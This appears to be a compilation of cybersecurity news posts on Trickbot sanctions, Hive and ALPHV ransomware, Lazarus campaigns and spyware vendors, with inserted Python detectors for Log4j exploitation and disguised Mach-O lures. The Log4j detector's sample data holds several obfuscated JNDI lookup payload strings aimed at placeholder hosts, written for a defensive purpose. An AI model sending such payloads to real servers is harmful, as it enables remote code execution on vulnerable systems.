U.S., U.K. Sanction 7 Men Tied to Trickbot Hacking Group

Authorities in the United States and United Kingdom today levied financial sanctions against seven men accused of operating “Trickbot,” a cybercrime-as-a-service platform based in Russia that has enabled countless ransomware attacks and bank account takeovers since its debut in 2016. The U.S. Department of the Treasury says the Trickbot group is associated with Russian intelligence services, and that this alliance led to the targeting of many U.S. companies and government entities.

Initially a stealthy trojan horse program delivered via email and used to steal passwords, Trickbot evolved into “a highly modular malware suite that provides the Trickbot Group with the ability to conduct a variety of illegal cyber activities, including ransomware attacks,” the Treasury Department said.

A spam email from 2020 containing a Trickbot-infected attachment. Image: Microsoft.

“During the height of the COVID-19 pandemic in 2020, Trickbot targeted hospitals and healthcare centers, launching a wave of ransomware attacks against hospitals across the United States,” the sanctions notice continued. “In one of these attacks, the Trickbot Group deployed ransomware against three Minnesota medical facilities, disrupting their computer networks and telephones, and causing a diversion of ambulances. Members of the Trickbot Group publicly gloated over the ease of targeting the medical facilities and the speed with which the ransoms were paid to the group.”

Only one of the men sanctioned today is known to have been criminally charged in connection with hacking activity. According to the Treasury Department, the alleged senior leader of the Trickbot group is 34-year-old Russian national Vitaly “Bentley” Kovalev.

A New Jersey grand jury indicted Kovalev in 2012 after an investigation by the U.S. Secret Service determined that he ran a massive “money mule” scheme, which used phony job offers to trick people into laundering money stolen from hacked small to mid-sized businesses in the United States. The 2012 indictment against Kovalev relates to cybercrimes he allegedly perpetrated prior to the creation of Trickbot.

BOTNET, THE MOVIE

In 2015, Kovalev reportedly began filming a movie in Russia about cybercrime called “Botnet.” According to a 2016 story from Forbes.ru, Botnet’s opening scene was to depict the plight of Christina Svechinskaya, a Russian student arrested by FBI agents in September 2010.

Christina Svechinskaya, a money mule hired by Bentley who was arrested by the FBI in 2010.

Svechinskaya was one of Bentley’s money mules, most of whom were young Russian students on temporary travel visas in the United States. She was among 37 alleged mules charged with aiding an international cybercrime operation — basically, setting up phony corporate bank accounts for the sole purpose of laundering stolen funds.

Although she possessed no real hacking skills, Svechinskaya’s mugshot and social media photos went viral online and she was quickly dubbed “the world’s sexiest computer hacker” by the tabloids.

Kovalev’s Botnet film project was disrupted after Russian authorities raided the film production company’s offices as part of a cybercrime investigation. In February 2016, Reuters reported that the raid was connected to a crackdown on “Dyre,” a sophisticated trojan that U.S. federal investigators say was the precursor to the Trickbot malware. The Forbes.ru article cited sources close to the investigation who said the film studio was operating as a money-laundering front for the cybercrooks behind Dyre.

TREASON

But shifting political winds in Russia would soon bring high treason charges against three of the Russian cybercrime investigators tied to the investigation into the film studio. In a major shakeup in 2017, the Kremlin levied treason charges against Sergey Mikhaylov, then deputy chief of Russia’s top anti-cybercrime unit.

Also charged with treason was Ruslan Stoyanov, then a senior employee at Russian security firm Kaspersky Lab [the Forbes.ru report from 2016 said investigators from Mikhaylov’s unit and Kaspersky Lab were present at the film company raid].

Russian media outlets have speculated that the men were accused of treason for helping American cybercrime investigators pursue top Russian hackers. However, the charges against both men were classified and have never been officially revealed. After their brief, closed trial, both men were convicted of treason. Mikhaylov was given a 22-year prison sentence; Stoyanov was sentenced to 14 years in prison.

In September 2021, the Kremlin issued treason charges against Ilya Sachkov, formerly head of the cybersecurity firm Group-IB. According to Reuters, Sachkov and his company were hired by the film studio “to advise the Botnet director and writers on the finer points of cybercrime.” Sachkov remains imprisoned in Russia pending his treason trial.

A WELL-OILED CYBERCRIME MACHINE

Trickbot was heavily used by Conti and Ryuk, two of Russia’s most ruthless and successful ransomware groups. Blockchain analysis firm Chainalysis estimates that in 2021 alone, Conti extorted more than $100 million from its victims, and that Ryuk extorted more than $150 million from its ransomware victims.

The U.S. cybersecurity firm CrowdStrike has long tracked the activities of Trickbot, Ryuk and Conti under the same moniker — “Wizard Spider” — which CrowdStrike describes as “a Russia-nexus cybercriminal group behind the core development and distribution of a sophisticated arsenal of criminal tools, that allow them to run multiple different types of operations.”

“CrowdStrike Intelligence has observed WIZARD SPIDER targeting multiple countries and industries such as academia, energy, financial services, government, and more,” said Adam Meyers, head of intelligence at CrowdStrike.

This is not the U.S. government’s first swipe at the Trickbot group. In early October 2020, KrebsOnSecurity broke the news that someone had launched a series of coordinated attacks designed to disrupt the Trickbot botnet. A week later, The Washington Post ran a story saying the attack on Trickbot was the work of U.S. Cyber Command, a branch of the Department of Defense headed by the director of the U.S. National Security Agency (NSA).

Days after Russia invaded Ukraine in February 2022, a Ukrainian researcher leaked several years of internal chat logs from the Conti ransomware gang. Those candid conversations offer a fascinating view into the challenges of running a sprawling criminal enterprise with more than 100 salaried employees. They also showed that Conti enjoyed protection from prosecution by Russian authorities, as long as the hacker group took care not to target Russian organizations.

In addition, the leaked Conti chats confirmed there was considerable overlap in the operation and leadership of Conti, Trickbot and Ryuk.

CrowdStrike’s Meyers said that while Wizard Spider operations have declined significantly since the demise of Conti in June 2022, today’s sanctions will likely cause temporary disruptions for the cybercriminal group while they look for ways to circumvent the financial restrictions, which make it illegal to transact with or hold the assets of sanctioned persons or entities.

“Often, when cybercriminal groups are disrupted, they will go dark for a time only to rebrand under a new name,” Meyers said.

The prosecution of Kovalev is being handled by the U.S. Attorney’s Office in New Jersey. A copy of the now-unsealed 2012 indictment of Kovalev is here (PDF).

#MIWIC2022: Paula Page, CCL Solutions Group

Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2022’s Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee’s answers are written in their own words with minor edits made by the editor for readability and where relevant, supplemented with additional commentary by their nominator.

This year, the awards are sponsored by Beazley, BT, KPMG and KnowBe4.


Paula Page, Director of Cyber, CCL Solutions Group Ltd

What does your job role entail?

All sorts! As my role started effectively within a start-up, albeit within an already established business, I wore many hats every day, especially within the first few years, but still often do as it’s very much a team effort.

Mostly though, my role in the Exec team and as Director of Cyber is mainly focused around the strategic piece, growth and relationship wise, client engagement and relationship building and then this is mirrored within my direct team as relationships are at the heart of everything we do.  

I work with my team to develop new service lines, I am responsible for recruitment, I get involved with scheduling still if needed (which is actually one of my favourite things, I love seeing a diary that has no space and working to make it happen, it’s a bit like Tetris for projects!) I am involved in supporting the billing process, I deal with any issues on projects or within the team that need to be escalated and genuinely get involved in anything and everything that pops its head up. I think that’s one of the things that led to me loving the work and industry so much, no two days are ever exactly the same and I love to be busy, fix problems and see progress. 

Many people in my role in other companies are technical but my background is very firmly rooted in the soft skills and relationship space, along with the commerciality. I have built an exceptionally strong technical team and together, we are able to ensure our clients and partners are provided with the best service made up of a team who are all experts in their field. 

How did you get into the cybersecurity industry?

Having always wanted to be a teacher, I decided on the day of sending my applications off that I really wasn’t sure anymore. I called my parents to tell them as I stood at the post box holding the envelope and they were really supportive, telling me to take my time and see what happened. 

Having no idea what was next, I worked a few admin roles as a temp and then saw a permanent role advertised in what turned out to be a Cyber Security company. It was never something I’d considered and absolutely didn’t think I’d end up making a career in the industry. 

I was offered the job as admin and the MD, Ian Glover, was really supportive and helped carve a role for me to support the Consultants. From there, another role developed and before long I was fully involved in the tender processes, scheduling work, carrying out QAs of proposals etc. I quickly realised I absolutely loved the work and the industry and the rest, as they say, is history!

What is one of the biggest challenges you have faced as a woman in the tech/cyber industry and how did you overcome it?

It won’t only be me who has often been the only woman in the room on many occasions over the years and this in itself can be a challenge, especially when you are in the early part of your career. It can be intimidating and I’m sure lots of women have found themselves in positions where the behaviour of others has made them want to give up. I was even told it wasn’t the industry for a woman and that I’d never ‘make’ it. 

My standout moment was at InfoSec a number of years back where someone felt it appropriate to proposition and touch me whilst on the stand for the company I worked for at the time with absolute confidence that he was doing nothing wrong. 

You can feel like no one has even seen you or that everyone’s eyes are on you but for totally the wrong reason, neither of which are pleasant. It’s also frustrating when the only topics you are invited to speak about are diversity, usually the done-to-death ‘woman in cyber’ angle. No one ever asks me to speak about being in an exec position, building a business or the soft skills which are so important in this industry and which are key to successful relationships. 

It can often be a struggle to have your voice or ideas heard but with persistence, and a huge dose of stubbornness, I started to feel that the people in the room were listening, and I was being asked for my ideas. It didn’t happen quickly, or easily, and I’d be lying if I said that the feeling of being seen as the token female doesn’t still hit sometimes. Imposter syndrome is also very real but again, gaining more confidence in my own ability and knowing that I am good at what I do, it happens less now than it used to.

I also feel that I have had to work far harder than any of my male colleagues to get into the position I am in now. 

What are your top three greatest accomplishments you have achieved during your career so far?

  • Building a business where people are the focus, both from a team and client perspective. I’ve worked with and for some great people through my career, but I have also worked for some whose behaviours were less than supportive and helped me be absolutely clear about the sort of leader I wanted to be should I ever get to that position. For me, the most important thing will always be the happiness of my team and clients and that has been the basis for everything I have done since I moved into my current role as Director of Cyber. 
  • Staying true to me, my ideas and my vision for the business that I wanted to build. I needed it to be something I was proud of, something that provided value and where clients wanted to return time after time. Being able to do this successfully whilst also raising a young family and ensuring I didn’t lose my time with them is something that took a lot of thought, planning and support from my husband but that I feel really proud that I’ve been able to do.
  • Working with and supporting young people through various competitions such as the NCSC Cyber First Girls Competition and Cyber Centurion. I also spend time with local schools, running Cyber Spotlight workshop days to highlight all the amazing opportunities within our industry in the hope of inspiring them to consider a cyber career in the future. I also support a charity that works to divert people who have been identified as being at risk of becoming involved in the criminal side of Cyber, and introduce them to the routes via various pathways into the ethical side of hacking. 

What are you doing to support other women, and/or to increase diversity, in the tech/cyber industry?

Supporting a team of girls in the NCSC CyberFirst Girls Competition was a great experience last year. Talking to them about cyber as an industry and the various opportunities available to them, and seeing how interested they were, gave me so much hope for the future and I look forward to working with another team this year.

I am responsible for recruitment, so I constantly look to hire people from all backgrounds and experience levels. Having not gone to university myself, and having grown up on a council estate in Glasgow, I am all too aware of the barriers to industry that exist for working class people. I am very aware that I have my first MD to thank for opening so many doors for me and I will always want to pay that forward. 

Also, building a flexible and supportive team where people are able to drop children at school and pick them up, take family members to appointments or take time to care for them means that groups of people, often mothers, are able to work in roles that they otherwise lose out on due to these important commitments. The industry loses out on so much talent through lack of flexibility and in turn, sidelining mothers and parents. I firmly believe that flexible working is at the heart of a successful business as it opens the door to some incredible talent and if we’re not making it easy for parents and carers to come into or stay in our industry, we’re doing them, and it, a huge disservice. 

What is one piece of advice you would give to girls/women looking to enter the cybersecurity industry?

Do it! I feel genuinely lucky to have stumbled into a role that led me to a full career in a space that I’d never considered but that I absolutely love. If you’re considering a career in the industry, you already know about it which is a step further along than I was.

Remember all roles in the industry aren’t technical and in fact, the soft skills needed to succeed are just as important and lead you to many different options. I am not a technical resource, but I have built a successful business filled with amazing people where clients feel valued and cared for. 

Mostly, be prepared to work hard, question things when you think they need to be, go with your gut and be unapologetically yourself.

The post #MIWIC2022: Paula Page, CCL Solutions Group appeared first on IT Security Guru.

Hive Group Admits to Leaking Data in Tata Power Ransomware Attack

Reports have said that the Hive ransomware-as-a-service (RaaS) group has claimed responsibility for the cyber-attack against Tata Power disclosed by the company on October 14 and believed to have occurred on October 3.

“The company has taken steps to retrieve and restore the systems. All critical operational systems are functioning,” the Mumbai-based company said at the time.

Security researcher Rakesh Krishnan has claimed that the leak affected several of Tata’s 12 million customers and includes personally identifiable information (PII) such as Aadhaar national identity card numbers, tax account numbers, salary information, addresses and phone numbers, among others.

Many have taken Hive’s leaking of the stolen data to mean that ransom negotiations failed, but Edward Liebig, global director of cyber-ecosystem at Hexagon, has suggested a different reading.

“Let’s face it, even if negotiations are successful, there is still only a 50% chance of recovery of the encrypted assets,” Liebig told Infosecurity in an emailed statement.

“The decision to pay or not to pay is a business call. If the organization is in a very vulnerable position (recovery of assets is not possible), if there is a chance for extremely damaging information to be compromised, or if the potential business impact far outweighs the ransom payment, then the business may decide to pay.”

The executive has said another aspect to consider in this scenario is the rules of the cyber insurance carrier.

“Some Cyber Insurers prohibit the payment of a ransom,” Liebig said. “This means that a ransomware Incident Response (IR) playbook must have a very defined and comprehensive declaration and approval process that goes to the top of the executive team.”

Further to this, Liebig has said he believes that increasing the chances of defending against ransomware begins with watching the front and back doors.

“Watch for, block, and educate against incoming spam and phishing attempts. Know your assets and endpoints. Know and mitigate the vulnerabilities within your environment that enable the exploitation of those assets,” Liebig explained.

“The best way to defend against ransomware is never to let it take root in your systems. The next best way is to have a bulletproof, trusted recovery strategy to minimize downtime and eliminate the ‘ransom’ debate.”

According to statistics published by Intel 471 and Digital Shadows, Hive was the third-most prevalent ransomware family observed in Q3 2022.

Lastly, the ransomware group also upgraded its tools to Rust in July to deliver more sophisticated encryption.

The post Hive Group Admits to Leaking Data in Tata Power Ransomware Attack appeared first on IT Security Guru.

Energy Providers Targeted by Lazarus Group

Lazarus Group, the North Korean threat actor, ran a malicious campaign against energy providers around the world between February and July 2022.

The campaign was partially disclosed by Symantec and AhnLab in April and May, respectively. Cisco Talos has now provided further details.

In an advisory published on Thursday, Cisco Talos said that the Lazarus campaign involved the exploitation of vulnerabilities in VMware Horizon to gain initial access to targeted organisations.

The advisory stated: “The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers. Successful post–exploitation led to the download of their toolkit from web servers.”

“In most instances, the attackers instrumented the reverse shell to create their own user accounts on the endpoints they had initial access to.”

The security researchers said that they discovered the use of two known malware families, YamaBot and VSingle, alongside the deployment of a recently disclosed implant they called ‘MagicRAT.’

“Once the backdoors and implants were persisted and activated on the endpoint, the reverse shell used to perform cleanup […], this included deleting all files in the infection folder along with the termination of the PowerShell tasks.”

“The attacker–created accounts were removed and finally, the Windows Event logs […] would be purged.”
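The chain quoted above (a Log4j lookup sent to an exposed Horizon server, a local account created for the attackers, and the Windows event logs purged afterwards) gives a detection engineer two places to catch it. The following Python is an added example and is not Talos’s code or tooling: it de-obfuscates Log4Shell-style lookups in web request logs, and correlates Windows Security events where an account is created (event ID 4720) and the Security log is later cleared (event ID 1102) on the same host. The log formats, hostnames, account names and the choice of those two event IDs are assumptions, and all sample lines are constructed.

```python
"""Two detections for the Horizon/Log4j chain described above (added example).

1. Log4Shell-style JNDI lookups in web request logs, after undoing the
   usual Log4j lookup obfuscations (${lower:x}, ${upper:x}, ${...:-x}).
2. Windows Security events matching the cleanup pattern: a local account
   created (4720) and the Security log cleared (1102) on the same host
   within a short window.

Log formats, hostnames, account names and the use of 4720/1102 are
assumptions for this example; the sample lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# --- 1. JNDI lookup detection -------------------------------------------------

# ${lower:j} -> j, ${upper:n} -> N, ${env:NOPE:-d} or ${::-d} -> d
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.I)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|nis)://", re.I)


def normalize_lookups(s: str) -> str:
    """Resolve nested Log4j lookups innermost-first until the string is stable."""
    prev = None
    while prev != s:
        prev = s
        s = _LOWER.sub(lambda m: m.group(1).lower(), s)
        s = _UPPER.sub(lambda m: m.group(1).upper(), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s


def find_jndi(lines):
    """Return the request-log lines that carry a JNDI lookup once de-obfuscated."""
    return [line for line in lines if _JNDI.search(normalize_lookups(line))]


# --- 2. Account creation followed by log clearing -----------------------------

_KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Parse 'ISO-timestamp key=value ...' into a dict with a datetime 'ts'."""
    ts, rest = line.split(" ", 1)
    ev = dict(_KV.findall(rest))
    ev["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return ev


def find_cleanup_chains(lines, window=timedelta(hours=6)):
    """Hosts where an account was created and the Security log was cleared
    within `window` afterwards. Returns (host, account, clear_time) tuples."""
    by_host = defaultdict(list)
    for ev in map(parse_event, lines):
        by_host[ev["host"]].append(ev)
    hits = []
    for host, events in by_host.items():
        creates = [e for e in events if e["EventID"] == "4720"]
        clears = [e for e in events if e["EventID"] == "1102"]
        for c in creates:
            for w in clears:
                if timedelta(0) <= w["ts"] - c["ts"] <= window:
                    hits.append((host, c["TargetUserName"], w["ts"].isoformat()))
    return hits


# Constructed sample input (not real telemetry).
SAMPLE_HTTP = [
    '10.0.0.5 "GET /portal/login HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 "GET /portal/login HTTP/1.1" 200 "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 "GET /portal/login HTTP/1.1" 200 "${${lower:j}ndi:${::-l}dap://203.0.113.9:1389/a}"',
    '198.51.100.7 "GET /portal/login HTTP/1.1" 200 "${${env:NONE:-j}${upper:n}di:rmi://198.51.100.7/x}"',
]
SAMPLE_EVENTS = [
    "2022-03-04T10:15:22Z host=HZN-01 EventID=4624 TargetUserName=svc_horizon",
    "2022-03-04T10:16:05Z host=HZN-01 EventID=4720 TargetUserName=svc_backup",
    "2022-03-04T10:16:06Z host=HZN-01 EventID=4732 TargetUserName=svc_backup",
    "2022-03-04T11:40:51Z host=HZN-01 EventID=4726 TargetUserName=svc_backup",
    "2022-03-04T11:41:10Z host=HZN-01 EventID=1102 SubjectUserName=svc_backup",
    "2022-03-05T08:00:00Z host=HZN-02 EventID=4720 TargetUserName=helpdesk2",
]

if __name__ == "__main__":
    for hit in find_jndi(SAMPLE_HTTP):
        print("JNDI lookup:", hit)
    for host, account, when in find_cleanup_chains(SAMPLE_EVENTS):
        print(f"{host}: account {account} created, Security log cleared at {when}")
```

The de-obfuscation loop matters because a plain substring match for `${jndi:` misses the nested-lookup variants that were common against Horizon. The second check is deliberately narrow; in practice one would also pull in the user-deleted event (4726) and the process that cleared the log, but the create-then-clear pairing on one host is already a high-signal pattern.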

Organisations targeted, according to Cisco Talos, were from countries including Canada, Japan and the US.

Additionally, the write up reads: “The campaign is meant to infiltrate organizations around the world for establishing long–term access and subsequently exfiltrating data of interest to the adversary’s nation–state.”

This advisory is the latest in a long list describing the Lazarus Group’s activity over summer.

In June, it was reported that the threat actor may be behind the $100m theft from cryptocurrency firm Harmony.

 

The post Energy Providers Targeted by Lazarus Group appeared first on IT Security Guru.

Job Seekers Targeted in Lazarus Group Hack

The North Korea state-backed Lazarus Group has been observed to be targeting job seekers with malware capable of executing on Apple Macs with Intel and M1 chipsets.

ESET, a Slovak cybersecurity firm, linked these events to a campaign dubbed “Operation In(ter)ception” that was first disclosed in June 2020 and involved using social engineering tactics to trick employees working in the military and aerospace sectors into opening fake job offer documents.

The latest attack is no different in that a job description for the Coinbase cryptocurrency exchange was used as a launchpad to drop a signed Mach-O executable.

The company tweeted: “Malware is compiled for both Intel and Apple Silicon. It drops three files: a decoy PDF document ‘Coinbase_online_careers_2022_07.pdf’, a bundle ‘FinderFontsUpdater.app,’ and a downloader ‘safarifontagent.’”

The decoy file, while sporting the .PDF extension, is in reality a Mach-O executable that functions as a dropper to launch FinderFontsUpdater, which, in turn, executes safarifontsagent, a downloader designed to retrieve next-stage payloads from a remote server.
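Because the lure is an executable wearing a .pdf name, an extension-based check passes it; the reliable test is the file’s leading bytes. The following Python is an added example, not ESET’s code or part of the sample analysis, that classifies files by magic number and flags a .pdf name sitting on Mach-O content, including the fat (universal) header that an Intel plus Apple Silicon build carries. The sample bytes are constructed, not taken from the lure.

```python
"""Flag files whose extension promises a document but whose bytes are a
Mach-O executable (added example; sample bytes are constructed, not taken
from the lure described above).
"""
import struct

# First four bytes of the Mach-O and fat/universal headers.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce": "Mach-O 32-bit (big-endian)",
    b"\xce\xfa\xed\xfe": "Mach-O 32-bit (little-endian)",
    b"\xfe\xed\xfa\xcf": "Mach-O 64-bit (big-endian)",
    b"\xcf\xfa\xed\xfe": "Mach-O 64-bit (little-endian)",
    b"\xca\xfe\xba\xbe": "Mach-O universal (fat)",
    b"\xbe\xba\xfe\xca": "Mach-O universal (fat, byte-swapped)",
}


def fat_arch_count(data: bytes) -> int:
    """Number of architecture slices in a fat header (big-endian nfat_arch)."""
    if len(data) < 8 or data[:4] != b"\xca\xfe\xba\xbe":
        return 0
    return struct.unpack(">I", data[4:8])[0]


def identify(data: bytes) -> str:
    """Classify by leading bytes rather than by name."""
    if data.startswith(b"%PDF-"):
        return "PDF"
    kind = MACHO_MAGICS.get(data[:4])
    if kind is None:
        return "unknown"
    if data[:4] == b"\xca\xfe\xba\xbe" and not 1 <= fat_arch_count(data) <= 16:
        # 0xCAFEBABE is also the Java class-file magic; a real fat binary has a
        # small slice count, whereas a class file has its version number here.
        return "Java class file"
    return kind


def mismatch(name: str, data: bytes) -> bool:
    """True when a .pdf name sits on top of non-PDF content."""
    return name.lower().endswith(".pdf") and identify(data) != "PDF"


# Constructed samples: a fake PDF that is a two-slice fat Mach-O, a real
# PDF header, a bare 64-bit Mach-O header standing in for the downloader
# stage, and a Java class file to show the 0xCAFEBABE ambiguity.
SAMPLES = {
    "Coinbase_online_careers_2022_07.pdf": b"\xca\xfe\xba\xbe\x00\x00\x00\x02" + b"\x00" * 32,
    "real_offer.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
    "safarifontsagent": b"\xcf\xfa\xed\xfe\x07\x00\x00\x01\x03\x00\x00\x00",
    "Hello.class": b"\xca\xfe\xba\xbe\x00\x00\x00\x3d" + b"\x00" * 8,
}


def scan(samples: dict) -> list:
    """Names whose extension and content disagree."""
    return [name for name, data in samples.items() if mismatch(name, data)]


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        flag = "MISMATCH" if mismatch(name, data) else ""
        print(f"{name:40} {identify(data):40} {flag}")
```

On a Mac the same question is answered by `file <path>`, and `codesign -dvv <path>` prints the signing identity and Team ID, which is how the developer certificate behind a signed lure like this one gets identified and reported for revocation.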

ESET said that the lure was signed on 21st July using a certificate issued in February 2022 to a developer named Shankey Nohria. Apple had begun the process of revoking the certificate as of 12th August.

It’s worth noting that the malware is cross-platform.

In July, it came to light that the Axie Infinity hack attributed to the Lazarus Group was the result of one of its former employees getting duped by a fake LinkedIn job offer.

 

The post Job Seekers Targeted in Lazarus Group Hack appeared first on IT Security Guru.

Feedzai with Lloyds Banking Group wins Aite-Novarica Fraud Impact Award

Feedzai has been named Best Transaction Fraud Monitoring and Decisioning Innovation in the Aite-Novarica Group 2022 Fraud Impact Innovation Awards. The award highlights how Feedzai empowers the bank’s data scientists to protect customers from scams and other fraud using a patented algorithm and providing a 360-degree entity view of payment risk. Due to its proficiency in mitigating fraud risk, Feedzai’s patented innovation is helping many financial institutions including Lloyds Banking Group, one of the largest retail banks in the world. 

According to recent reports, financial crime has been on the rise since the COVID-19 pandemic began and large numbers of people have turned online for their banking activities. In the U.S., the impact of identity fraud last year was $52 billion in financial loss, affecting 42 million consumer victims (Javelin Research). In the U.K., authorised push payment scams reached £355 million in the first half of 2021, a year-on-year increase of 70 percent. 

“Today’s fraud scams are increasingly hard to stop by traditional solutions because the transactions involve genuine customers on their actual devices, at their usual IP,” said Pedro Barata, Chief Product Officer at Feedzai. “Lloyds Banking Group and Feedzai have pioneered an approach that utilises all available data across multiple channels to make fair fraud risk decisions in milliseconds, based on an individual’s specific details and activities, not one that is dependent on generalised customer groupings.” 

The Feedzai RiskOps Platform has been proven to increase protection for banking customers against scams. The innovation and technical strengths of the solution contributed to the award win, as they provide customers with tangible benefits, including: 

  • Financial crime risk mitigation – Higher detection rates and lower false-positives help protect banks and their customers from the costly and distressing experience of fraud and scams. 
  • Enhanced user experience – Reduces friction for good customers and lowers the number of unnecessary contacts with analysts and call centres. 
  • Operational efficiency – Keeps intervention rates low and ensures a less complex system through model-driven as well as rule-driven systems. 

“Organised crime continues to attack financial services firms and consumers, always finding new and clever ways to circumvent their defences. Legacy approaches are less effective at keeping pace with, and adapting to, the escalating threat landscape,” says Chuck Subrt, Fraud & AML Practice Director at Aite-Novarica Group. “Fraud and AML executives recognise the imperative for more innovative tools that can drive meaningful intelligence, smarter decision-making, and better outcomes,” he explains. 

The post Feedzai with Lloyds Banking Group wins Aite-Novarica Fraud Impact Award appeared first on IT Security Guru.

Ransomware Group Demands £500,000 From Bedfordshire School

Wootton Upper School in Bedfordshire suffered a ransomware attack this week, with hackers demanding £500,000 in ransom, according to reports.

The attack also affected Kimberley College for 16-19 year olds, both being members of the Wootton Academy Trust. The attack was said to be the work of the Hive ransomware group.

The cybercriminals messaged parents and students to inform them of the compromise. Bank details, medical records, home addresses and psychological reviews were stolen in the attack.

On Tuesday, the Trust updated students and parents by saying that the disruption to its operations was limited due to the upcoming summer school holidays. The attack has, however, affected the production of some grade sheets along with scheduling for next year. The Trust hopes that backups will allow it to retrieve some data. Normal operations are expected to return within 10 days.

The Hive group believes that Wootton has £500,000 in cyber insurance, according to Bedford Today, a local newspaper. It has threatened the Trust with the release of all data unless they pay up.

The Trust said, “we understand there may be concerns about whether any pupil/student data has been impacted. While we don’t have firm answers to these questions at the moment, this is our number one priority of the ongoing investigations.”

Global cybersecurity advisor at ESET and former head of digital forensics at Dorset Police, Jake Moore, warned that the potential release of stolen data could pose a big problem for the Trust, even though the timing minimised disruption for the school.

Moore suggested that the damage could last for years. He added that local authorities often lack the funds to pay the desired ransoms, suggesting that this may not have been a targeted attack; rather, the school may simply have been caught up in a broader sweep of vulnerable systems.

The post Ransomware Group Demands £500,000 From Bedfordshire School appeared first on IT Security Guru.

Microsoft Threat Intelligence Center Links Threat Group to Austrian Spyware Vendor DSIRF

Microsoft has linked the efforts of the threat group Knotweed to an Austrian spyware vendor, DSIRF. The group has so far used the malware dubbed ‘Subzero’ to attack organisations in Europe and Central America. The Subzero malware, as used by Knotweed, can be used to hack a target’s phone, computers, network, and internet-connected devices.

DSIRF markets itself as a company that provides information research, forensics, and data-driven intelligence services to corporations. Yet Microsoft has found multiple associations between the two apparently unrelated entities that establish a concrete link.

“These include command-and-control infrastructure used by the malware directly linking to DSIRF, a DSIRF-associated GitHub account being used in one attack, a code signing certificate issued to DSIRF being used to sign an exploit, and other open-source news reports attributing Subzero to DSIRF,” Microsoft said.

“Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama.”

In 2021, the cyber mercenary group was also linked to the exploitation of a fourth zero-day, a Windows privilege escalation flaw in the Windows Update Medic Service (CVE-2021-36948) used to force the service to load an arbitrary signed DLL.

“To limit these attacks, we issued a software update to mitigate the use of vulnerabilities and published malware signatures that will protect Windows customers from exploits Knotweed was using to help deliver its malware,” said Cristin Goodwin, General Manager at Microsoft’s Digital Security Unit.

“We are increasingly seeing PSOAs selling their tools to authoritarian governments that act inconsistently with the rule of law and human rights norms, where they are used to target human rights advocates, journalists, dissidents and others involved in civil society,” Goodwin added.

The post Microsoft Threat Intelligence Center Links Threat Group to Austrian Spyware Vendor DSIRF appeared first on IT Security Guru.

Ransomware Group Debuts Searchable Victim Data

Cybercrime groups that specialize in stealing corporate data and demanding a ransom not to publish it have tried countless approaches to shaming their victims into paying. The latest innovation in ratcheting up the heat comes from the ALPHV/BlackCat ransomware group, which has traditionally published any stolen victim data on the Dark Web. Today, however, the group began publishing individual victim websites on the public Internet, with the leaked data made available in an easily searchable form.

The ALPHV site claims to care about people’s privacy, but they let anyone view the sensitive stolen data.

ALPHV recently announced on its victim shaming and extortion website that it had hacked a luxury spa and resort in the western United States. Sometime in the last 24 hours, ALPHV published a website with the same victim’s name in the domain, and their logo on the homepage.

The website claims to list the personal information of 1,500 resort employees, and more than 2,500 residents at the facility. At the top of the page are two “Check Yourself” buttons, one for employees, and another for guests.

Brett Callow, a threat analyst with security firm Emsisoft, called the move by ALPHV “a cunning tactic” that will most certainly worry their other victims.

Callow said most of the victim shaming blogs maintained by the major ransomware and data ransom groups exist on obscure, slow-loading sites on the Darknet, reachable only through the use of third-party software like Tor. But the website erected by ALPHV as part of this new pressure tactic is available on the open Internet.

“Companies will likely be more concerned about the prospect of their data being shared in this way than of simply being posted to an obscure Tor site for which barely anyone knows the URL,” Callow said. “It’ll piss people off and make class actions more likely.”

It’s unclear if ALPHV plans to pursue this approach with every victim, but other recent victims of the crime group include a school district and a U.S. city. Most likely, this is a test run to see if it improves results.

“We are not going to stop, our leak distribution department will do their best to bury your business,” the victim website reads. “At this point, you still have a chance to keep your hotel’s security and reputation. We strongly advise you to be proactive in your negotiations; you do not have much time.”

Emerging in November 2021, ALPHV is perhaps most notable for its programming language (it is written in Rust). ALPHV has been actively recruiting operators from several ransomware organizations, including REvil, BlackMatter and DarkSide, offering affiliates up to 90 percent of any ransom paid by a victim organization.

Many security experts believe ALPHV/BlackCat is simply a rebrand of another ransomware group, “DarkSide” a.k.a. “BlackMatter,” the same gang responsible for the May 2021 attack on Colonial Pipeline that caused fuel shortages and price spikes for several days.

Callow said there may be an upside to this ALPHV innovation, noting that his wife recently heard directly from a different ransomware group — Cl0p.

“On a positive note, stunts like this mean people may actually find out that their PI has been compromised,” he said. “Cl0p emailed my wife last year. The company that lost her data still hasn’t made any public disclosure or notified the people who were impacted (at least, she hasn’t heard from the company.)”